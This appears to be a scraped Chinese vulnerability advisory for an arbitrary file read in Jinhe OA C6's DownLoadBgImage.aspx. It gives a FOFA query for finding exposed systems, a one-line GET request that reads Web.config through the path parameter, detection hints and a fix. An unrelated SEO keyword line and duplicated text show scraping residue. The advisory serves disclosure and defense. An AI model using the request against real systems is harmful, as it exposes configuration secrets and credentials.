网站优化流程,企业微信开发者平台,做网站代运营如何寻找客户,做推文的网站知乎金和OA C6 DownLoadBgImage任意文件读取漏洞
漏洞描述
金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统#xff0c;主要应用于企业资源规划#xff08;ERP#xff09;、客户关系管理#xff08;CRM#xff09;以及办公自动化#xff08;OA#xff09…金和OA C6 DownLoadBgImage任意文件读取漏洞
漏洞描述
金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统主要应用于企业资源规划ERP、客户关系管理CRM以及办公自动化OA等领域。金和OA C6 接口JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx 其参数path存在文件遍历漏洞可读取系统任意文件造成信息泄露。
威胁等级: 高危
漏洞分类: 信息泄露
涉及厂商及产品金和C6
应用指纹及检出思路
此用存在二次开发的可能性接口存在JHSoft 关键词可大致判断
fofabodyJHSoft.Web.AddMenu || app金和网络-金和OA
漏洞复现
GET /C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/?path/C6/Web.config HTTP/1.1 Host: 检测思路
检测web.config关键字段即可。如 等。
修复建议
设置访问控制策略禁用此接口
